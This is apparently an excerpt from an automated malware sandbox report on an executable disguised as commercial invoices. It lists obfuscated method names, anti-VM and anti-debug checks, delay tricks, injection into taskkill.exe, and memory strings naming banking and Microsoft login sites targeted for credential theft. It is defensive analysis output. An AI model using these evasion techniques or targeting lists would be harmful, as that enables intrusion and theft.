            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, bZLr5dIHP2nUPnA0nI.csHigh entropy of concatenated method names: 'e7l3oEvGWF', 'VkF3isbbId', 'Lbp3poTr2I', 'noI3EJdbtN', 'ni638KEe49', 'JMv3RVHd6F', 'MvL3noDxg6', 'Xpw3enkPMc', 'RDG3DqnTm5', 'QgQ3jQN6Ae'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, hCECRwYOSLpQCB6qx8.csHigh entropy of concatenated method names: 'Dispose', 'db0uCoLTDK', 'HJhhEY60Yy', 'vbBGGIuivj', 'iVquUrRUbY', 'zrouzZVo3O', 'ProcessDialogKey', 'o75hvE2KVf', 'O2yhubl4U7', 'aIlhhISAqc'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, DP8bVlHOj0ljQyuNZ6.csHigh entropy of concatenated method names: 'DwM1LQccj', 'gqacVfQiQ', 'mZ0SIRdh2', 'MrKHZUSrL', 'h52iCbKBK', 'xDIbTLV2I', 'fes4AsrBk4NeLGy4HX', 'TNmov7pPSAZSb3p8EJ', 'KCo675m0M', 'o5aqajBcS'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, mfFkuJ5rWwRdGwBJMS.csHigh entropy of concatenated method names: 'b3oXO9p1br', 'VPBXU2KLRw', 'DLQ6v5qrnl', 'wTi6ugBjTF', 'FUNXjhFKwd', 'uoZXl5Gxu1', 'oWiXkaF79M', 'trBXry3OlA', 'gU1XN83UQp', 'egWXQdFNQL'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, YLPLgdjdRFYqApV2un.csHigh entropy of concatenated method names: 'VEAwTwV7KA', 'DPdwxJcfYI', 'wUAwPCBiiy', 'hcNwBuIeRo', 'nCrwaH0UWV', 'gL0PmiBmLr', 'kk9P9mNmwH', 'lkwPKLItZ4', 'pF9POLTZeg', 'PxpPCo3ysx'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, nYtUVc1f98ph2ybXswK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Jx1qryY890', 'XuCqNpD15F', 'P9vqQlExPp', 'bWiqISOkpL', 'OMEqm360PR', 'fBhq9lsU0J', 'QxKqK0sAxB'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, bUWG7PgKOhSfiEeOT7.csHigh entropy of concatenated method names: 'man6st8OIQ', 'Pwx6x6veYd', 'Y1H6tLF3LS', 'FtK6P0Y4Jd', 'OP56wXncPy', 'PnT6BrqIAB', 'jUe6aSbjn7', 'bmt67T9EFI', 'aub65pxFQP', 'ucv60Ly8ct'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, qrSvWW10fNhaTHKXDHV.csHigh entropy of concatenated method names: 'AbXJYlNUjP', 'h9ZJZHS6KX', 'MuxJ1lOHa9', 'RiiJcG8FyC', 'yR1JgRo2nQ', 'H1PJSW7a1p', 'OtKJHRIUqC', 'eWfJoQS6UF', 'h5lJif5xkP', 'VNqJb9whlv'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, SV9D1XeqHF0diChIWw.csHigh entropy of concatenated method names: 'z0HMTFlSUr', 'MR6MsnJ8rF', 'xWYMx5IHZh', 'Ac1MtCT7Ip', 'pv7MPulKDj', 'E77Mwj6KIh', 'aoIMBc3EhS', 'JcdMaWCEZ5', 'sm8M75YPYc', 'OHpM5waVXP'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, xpvY8rRaUE3whfWfo7.csHigh entropy of concatenated method names: 'IYCJuJ53qc', 'ttOJMnuq7J', 'FC6JWlvBtf', 'oiWJsHZGQC', 'H4AJxgnRbg', 'ghYJPZjEdh', 'c35Jw5OsNV', 'gFR6KXPGUR', 'TKr6Onp9l0', 'NOj6CXKC0D'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, RUACNAEq3joZFW6PJt.csHigh entropy of concatenated method names: 'Fie6pqgy9M', 'kfY6E2udxm', 'S4E64Zf12O', 'bFj68J5n5j', 'EMj6rMddfu', 'vAC6RaGEup', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, klUv3e7OgOX75n6OJS.csHigh entropy of concatenated method names: 'KNuVD0TCOW', 'poRVlvLCaa', 'E6OVrvkPTO', 'Q8iVNs1c5f', 'iOUVE3AAHS', 'O0VV4JMQPe', 'lqpV80sLqF', 'RnMVRiqmRb', 'dWqV2mHHgF', 'eYCVnCNDbE'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, q598vXWMJVqmSJ4TcV.csHigh entropy of concatenated method names: 'UCsxrkPEMW', 'nIsxNe8PLI', 'a0kxQOgJCY', 'RmrxI3IOoX', 'mJKxm9RMUc', 'gf9x9D9UT0', 'YJgxKdQD5y', 'LuOxO2BDha', 'D6MxC8ahrb', 'R5uxU2OppS'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, U4MZBR8NwmLOtx27mp.csHigh entropy of concatenated method names: 'KSxBsSZo5a', 'F77BtyOXKd', 'SZDBw2upF5', 'jq7wUl1HIv', 'kkOwzGdA9p', 'q8UBvQE2bX', 'VJTBuJYrpg', 'CQ2BhDerR4', 'XiVBMusDi5', 'StoBWdlbrW'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, XYbpMIyCGhf593orlY.csHigh entropy of concatenated method names: 'PxaBYvQDX7', 'yuMBZF3huP', 'HSWB1FnJnl', 'ic4BcNp7LS', 'cwRBgFUhr4', 'UQcBSubIIv', 'CAqBHFDplY', 'VQLBoara1K', 'Q4JBiT93f4', 'hU0Bb3nMay'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, e9ABKXtgEBCcdDS8fM.csHigh entropy of concatenated method names: 'xL5tcmfO3X', 'X21tShyPBo', 'mX5toaS448', 'hJttiiFk3y', 'NVYtVyHnNQ', 'c4LtfShvQx', 'aCQtXIL0NB', 'J2Lt6KwM5H', 'yT0tJh9qlL', 'vxotqfZ6J4'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, HdBXwX4EpLlOYfjryw.csHigh entropy of concatenated method names: 'ToString', 'uqBfj3Fcx9', 'FlFfEoFwc0', 'JBrf4TPPGw', 'BtIf8HTXnc', 'adkfRt3Gv9', 'M2Kf2B8ofp', 'aeVfnmkEau', 'xmhfelm3U9', 'jgyfLi4JFD'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, vVQ4gmc6IjLKXDHf3D.csHigh entropy of concatenated method names: 'DWBuBAJsvi', 'WU1uaxTE6J', 'wM0u5biAWJ', 'YR2u0FdaQH', 'NgfuVUhBHV', 'fD5ufQGZW7', 'kQ9nNDoFkVfhwIDgkh', 'CpC7dGafPMOb5v1q3h', 'vmWuuZ7Ury', 'GJQuMCT3vX'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, bZLr5dIHP2nUPnA0nI.csHigh entropy of concatenated method names: 'e7l3oEvGWF', 'VkF3isbbId', 'Lbp3poTr2I', 'noI3EJdbtN', 'ni638KEe49', 'JMv3RVHd6F', 'MvL3noDxg6', 'Xpw3enkPMc', 'RDG3DqnTm5', 'QgQ3jQN6Ae'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, hCECRwYOSLpQCB6qx8.csHigh entropy of concatenated method names: 'Dispose', 'db0uCoLTDK', 'HJhhEY60Yy', 'vbBGGIuivj', 'iVquUrRUbY', 'zrouzZVo3O', 'ProcessDialogKey', 'o75hvE2KVf', 'O2yhubl4U7', 'aIlhhISAqc'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, DP8bVlHOj0ljQyuNZ6.csHigh entropy of concatenated method names: 'DwM1LQccj', 'gqacVfQiQ', 'mZ0SIRdh2', 'MrKHZUSrL', 'h52iCbKBK', 'xDIbTLV2I', 'fes4AsrBk4NeLGy4HX', 'TNmov7pPSAZSb3p8EJ', 'KCo675m0M', 'o5aqajBcS'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, mfFkuJ5rWwRdGwBJMS.csHigh entropy of concatenated method names: 'b3oXO9p1br', 'VPBXU2KLRw', 'DLQ6v5qrnl', 'wTi6ugBjTF', 'FUNXjhFKwd', 'uoZXl5Gxu1', 'oWiXkaF79M', 'trBXry3OlA', 'gU1XN83UQp', 'egWXQdFNQL'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, YLPLgdjdRFYqApV2un.csHigh entropy of concatenated method names: 'VEAwTwV7KA', 'DPdwxJcfYI', 'wUAwPCBiiy', 'hcNwBuIeRo', 'nCrwaH0UWV', 'gL0PmiBmLr', 'kk9P9mNmwH', 'lkwPKLItZ4', 'pF9POLTZeg', 'PxpPCo3ysx'
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: COMMERCIAL INVOICES.exe PID: 4144, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\taskkill.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\taskkill.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\taskkill.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\taskkill.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\taskkill.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\taskkill.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\taskkill.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeMemory allocated: 29B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeMemory allocated: 2CA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeMemory allocated: 29B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeMemory allocated: 8E00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeMemory allocated: 9E00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeMemory allocated: A000000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeMemory allocated: B000000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0128096E rdtsc 4_2_0128096E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeWindow / User API: threadDelayed 829Jump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeWindow / User API: threadDelayed 9143Jump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\taskkill.exeAPI coverage: 2.4 %
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe TID: 3056Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exe TID: 7060Thread sleep count: 829 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exe TID: 7060Thread sleep time: -1658000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exe TID: 7060Thread sleep count: 9143 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exe TID: 7060Thread sleep time: -18286000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe TID: 1292Thread sleep time: -45000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe TID: 1292Thread sleep time: -36000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\taskkill.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0086C3E0 FindFirstFileW,FindNextFileW,FindClose,6_2_0086C3E0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: oKWoZthfkV.exe, 00000009.00000002.3899214281.0000000000EAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
            Source: 2636-l0.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 2636-l0.6.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 2636-l0.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 2636-l0.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 2636-l0.6.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 2636-l0.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 2636-l0.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 2636-l0.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 2636-l0.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: taskkill.exe, 00000006.00000002.3897956616.0000000002AFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}&[
            Source: 2636-l0.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 2636-l0.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 2636-l0.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 2636-l0.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 2636-l0.6.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 2636-l0.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: firefox.exe, 0000000A.00000002.2830130750.000001B34A1BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 2636-l0.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 2636-l0.6.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: 2636-l0.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 2636-l0.6.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 2636-l0.6.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 2636-l0.6.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 2636-l0.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 2636-l0.6.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 2636-l0.6.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 2636-l0.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 2636-l0.6.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 2636-l0.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: 2636-l0.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 2636-l0.6.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 2636-l0.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 2636-l0.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0128096E rdtsc 4_2_0128096E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_00417413 LdrLoadDll,4_2_00417413
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01270124 mov eax, dword ptr fs:[00000030h]4_2_01270124
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EE10E mov eax, dword ptr fs:[00000030h]4_2_012EE10E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EE10E mov ecx, dword ptr fs:[00000030h]4_2_012EE10E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EE10E mov eax, dword ptr fs:[00000030h]4_2_012EE10E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EE10E mov eax, dword ptr fs:[00000030h]4_2_012EE10E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EE10E mov ecx, dword ptr fs:[00000030h]4_2_012EE10E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EE10E mov eax, dword ptr fs:[00000030h]4_2_012EE10E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EE10E mov eax, dword ptr fs:[00000030h]4_2_012EE10E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EE10E mov ecx, dword ptr fs:[00000030h]4_2_012EE10E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EE10E mov eax, dword ptr fs:[00000030h]4_2_012EE10E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EE10E mov ecx, dword ptr fs:[00000030h]4_2_012EE10E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01300115 mov eax, dword ptr fs:[00000030h]4_2_01300115
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EA118 mov ecx, dword ptr fs:[00000030h]4_2_012EA118
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EA118 mov eax, dword ptr fs:[00000030h]4_2_012EA118
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EA118 mov eax, dword ptr fs:[00000030h]4_2_012EA118
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EA118 mov eax, dword ptr fs:[00000030h]4_2_012EA118
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01314164 mov eax, dword ptr fs:[00000030h]4_2_01314164
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01314164 mov eax, dword ptr fs:[00000030h]4_2_01314164
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D4144 mov eax, dword ptr fs:[00000030h]4_2_012D4144
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D4144 mov eax, dword ptr fs:[00000030h]4_2_012D4144
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D4144 mov ecx, dword ptr fs:[00000030h]4_2_012D4144
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D4144 mov eax, dword ptr fs:[00000030h]4_2_012D4144
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D4144 mov eax, dword ptr fs:[00000030h]4_2_012D4144
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01246154 mov eax, dword ptr fs:[00000030h]4_2_01246154
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01246154 mov eax, dword ptr fs:[00000030h]4_2_01246154
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123C156 mov eax, dword ptr fs:[00000030h]4_2_0123C156
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D8158 mov eax, dword ptr fs:[00000030h]4_2_012D8158
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012FC188 mov eax, dword ptr fs:[00000030h]4_2_012FC188
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012FC188 mov eax, dword ptr fs:[00000030h]4_2_012FC188
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01280185 mov eax, dword ptr fs:[00000030h]4_2_01280185
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E4180 mov eax, dword ptr fs:[00000030h]4_2_012E4180
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E4180 mov eax, dword ptr fs:[00000030h]4_2_012E4180
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C019F mov eax, dword ptr fs:[00000030h]4_2_012C019F
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C019F mov eax, dword ptr fs:[00000030h]4_2_012C019F
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C019F mov eax, dword ptr fs:[00000030h]4_2_012C019F
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C019F mov eax, dword ptr fs:[00000030h]4_2_012C019F
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123A197 mov eax, dword ptr fs:[00000030h]4_2_0123A197
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123A197 mov eax, dword ptr fs:[00000030h]4_2_0123A197
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123A197 mov eax, dword ptr fs:[00000030h]4_2_0123A197
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013161E5 mov eax, dword ptr fs:[00000030h]4_2_013161E5
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012701F8 mov eax, dword ptr fs:[00000030h]4_2_012701F8
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013061C3 mov eax, dword ptr fs:[00000030h]4_2_013061C3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013061C3 mov eax, dword ptr fs:[00000030h]4_2_013061C3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BE1D0 mov eax, dword ptr fs:[00000030h]4_2_012BE1D0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BE1D0 mov eax, dword ptr fs:[00000030h]4_2_012BE1D0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BE1D0 mov ecx, dword ptr fs:[00000030h]4_2_012BE1D0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BE1D0 mov eax, dword ptr fs:[00000030h]4_2_012BE1D0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BE1D0 mov eax, dword ptr fs:[00000030h]4_2_012BE1D0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123A020 mov eax, dword ptr fs:[00000030h]4_2_0123A020
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123C020 mov eax, dword ptr fs:[00000030h]4_2_0123C020
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D6030 mov eax, dword ptr fs:[00000030h]4_2_012D6030
